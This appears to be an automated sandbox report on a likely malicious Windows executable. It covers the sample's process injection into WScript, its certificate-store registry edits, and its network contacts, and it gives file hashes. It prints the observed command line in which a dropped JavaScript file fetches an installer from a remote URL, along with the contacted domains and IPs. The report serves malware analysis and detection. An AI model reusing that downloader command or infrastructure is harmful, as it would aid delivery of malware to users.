Malware Analysis Report

2025-06-16 07:32

Sample ID 240601-yyweesee28
Target 8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118
SHA256 29dabe35f9152188abfde68ee58856d47a421c7d7bda87ff68c5bf5f692d00df
Tags
execution
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

29dabe35f9152188abfde68ee58856d47a421c7d7bda87ff68c5bf5f692d00df

Threat Level: Likely malicious

The file 8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118 was found to be: Likely malicious.

Malicious Activity Summary

execution

Blocklisted process makes network request

Checks computer location settings

Command and Scripting Interpreter: JavaScript

Enumerates physical storage devices

Unsigned PE

Program crash

Modifies system certificate store

Modifies registry class

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-01 20:12

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-01 20:12

Reported

2024-06-01 20:14

Platform

win7-20231129-en

Max time kernel

118s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe"

Signatures

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 C:\Windows\SysWOW64\WScript.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C C:\Windows\SysWOW64\WScript.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 C:\Windows\SysWOW64\WScript.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C C:\Windows\SysWOW64\WScript.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 C:\Windows\SysWOW64\WScript.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2028 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2028 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WerFault.exe
PID 2028 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WerFault.exe
PID 2028 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WerFault.exe
PID 2028 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf722.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf722.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf722.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf722.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf722.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf722.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf722.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf722.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf722.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf722.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 460

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.djapp.info udp
US 8.8.8.8:53 bi.downthat.com udp
US 3.140.13.188:80 bi.downthat.com tcp
US 8.8.8.8:53 www.hugedomains.com udp
US 104.26.6.37:443 www.hugedomains.com tcp
US 8.8.8.8:53 pki.goog udp
US 216.239.32.29:80 pki.goog tcp
US 8.8.8.8:53 www.microsoft.com udp
US 3.140.13.188:80 bi.downthat.com tcp
US 104.26.6.37:443 www.hugedomains.com tcp
US 3.140.13.188:80 bi.downthat.com tcp
US 104.26.6.37:443 www.hugedomains.com tcp
US 3.140.13.188:80 bi.downthat.com tcp
US 104.26.6.37:443 www.hugedomains.com tcp
US 3.140.13.188:80 bi.downthat.com tcp
US 104.26.6.37:443 www.hugedomains.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\fuf722.js

MD5 3813cab188d1de6f92f8b82c2059991b
SHA1 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256 a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA512 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\X531EG1G.txt

MD5 093d20442d381bf025090c64946fb944
SHA1 399789198c7745cfd5eafff4c2d6f9e54b587ff1
SHA256 1160fbf4429c0ae348f5d99211f113122cd8028fe4ba0d7146f4cb3b93c7c412
SHA512 5b2397436e554f2a93b807edb75690e0360ee7a56c672f2dfca632902067998d6a36f8711b2071b5c27d14fc6fd2e18e45c80ae1a25c9832c1b70ee24b52f23f

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1J224M4\domain_profile[1].htm

MD5 6e2125138c3caf153ea4f9637c965e0f
SHA1 1477d0eed82b4dc4c6bdfa516bafb0b0607890de
SHA256 2e79dd13e68730ee3ad9928968e347d01367e6e3173d190cedf01869483a5d87
SHA512 4771348e79ef76d9e70f003f7b384735fc83b1541858fd9af0a00d516787e6d0a1ce719f6424756d9ce7aabe158aa4edd27e2965031420c234250f3be3aab221

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 064e0d148a9c6dc31553d5853fe701ef
SHA1 b83ef46a854fe5fea917a340ebb2099b0ad4ac0b
SHA256 bee03cb21bd4c4040d379657f7ea8c53a8a66b20113090ff97bb86adf8928ded
SHA512 3b6fd108929b7ea78ed19c63ee25bb8fb4f370dac29ff73dfdea4fea4ebd19255b52313b49ac1d1f3d891641bf91eb3eb1ec50103eb472a8a007a9aee9637dc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 371e0e8ad5bf71ee0415bc0ef2810f46
SHA1 5a7652aba6165d8606e4fa290d4933499efdfc9d
SHA256 5e68fdc9ff581251f352de874c3b1ef18d22cc0f38684d368d22ac2e8a0d0a0f
SHA512 754705c70d40b44af8feffb04b6b390729010280c92e27877b3e78aed95d16b874b0f514f039fb7e66f82f0251b254ff004261ec367f750068fd88d8488c422c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 367be39f0f0bd10ee528276085ebdf48
SHA1 bd2d8f3b91e3d0e5dcca4c0734f27ca4b0f257ce
SHA256 6568d4a4c638ae3fec4d5bef16d7f5378195466005a7d7de3667b501878e566c
SHA512 1e33cbeabbf89c1d5f5320be70459a27b2b4fdbbb4e5bd8fdcd4f4dea5b5b7761e49ca4cc72dd0a33423e4ce15353495eeef01472c7cb005c9d9dd4ea9d4a606

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 e1c83e43bce6f1e2d63dedd5fb5b737a
SHA1 c4f7f6ddd762622d230f79a785495e0904d2e9a1
SHA256 fb1bb667f8eef8ae1528418dfe84eacad9cf01f4ab3da365c6aedd3e07af8bea
SHA512 4b3a6056093a3c2352def199044d8fc1ee85dafd01b07486a83a3be4240d317b8804ebe7471ab8d9aaeedf2d748720255ead65c7ef1cf7b069c268a4838a5b79

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 fb3d4c03f0410c33373834b0836fab05
SHA1 a31b7e36de6b7794bff6ed26e86f4e2957d94fa2
SHA256 e3cf3f79ad0e1cb98e344cdd265c11ee55f5c77864629b5a4243d8f3071c6160
SHA512 eccaebcb4fa20fae1f2bf56700eb3e1501945b76c307bf28944518ce7b227d388337fa098ada95c080699f4641cfc6693cbbd42dc2d943a426633b470baa5e2a

C:\Users\Admin\AppData\Local\Temp\Tar369B.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L47MRCGC\domain_profile[1].htm

MD5 85ac5b0c1d4e9718f7041eefbd088ca6
SHA1 45d9405296a830719795c41b0c28381d69d4f00e
SHA256 23fe0d3946aae3cba28758c331b913d7de8441aa8e3b1459a1f3e55975c51570
SHA512 1f2e03ccabcda8d07d26df0bbb6cef9b65d6a8eb00ade2122d76bef5a0f815806601f8d191fd5a500b0eaac2eaf12510660106a94cdfbfdb8072b9b2010a3a96

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1J224M4\domain_profile[1].htm

MD5 f69723107188c758ac327cd3078490f0
SHA1 774a1619b4bf70cbeed19552f80fcf66d5a7d25c
SHA256 75b1a27866addae0e781f50167f35627e26b7a49e589dea304d8e67ae672c7c1
SHA512 7764b9f19fdc41fcf76e80b83dfbb5b83e2dcec64bde8bba1ee69f2471f5d8105d87f11b283c62e4e833922ad789a052c091c94677859f9a95bdf1063cbed9dc

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L47MRCGC\domain_profile[1].htm

MD5 ba02e5bc1cc86e37fc860aa61f722e56
SHA1 03809938564fb66fd1e74bfb030d645827ddd124
SHA256 dc078c167cdd340aa294b8828e477d805f49511890d3cd1d94711108be0cfc81
SHA512 c5df39dfa63ca24fe7571c01101a69cf1716f8fff60406f2bf55b8da2bbcac32978bc21c75088a08f4803b9fe2e0fbc7b9b87b5004ffb3f5da7210e98e53b0b0

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-01 20:12

Reported

2024-06-01 20:14

Platform

win10v2004-20240426-en

Max time kernel

93s

Max time network

94s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WScript.exe N/A
N/A N/A C:\Windows\SysWOW64\WScript.exe N/A
N/A N/A C:\Windows\SysWOW64\WScript.exe N/A
N/A N/A C:\Windows\SysWOW64\WScript.exe N/A
N/A N/A C:\Windows\SysWOW64\WScript.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe N/A

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4344 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 4344 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 4344 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 4344 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 4344 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 4344 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 4344 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
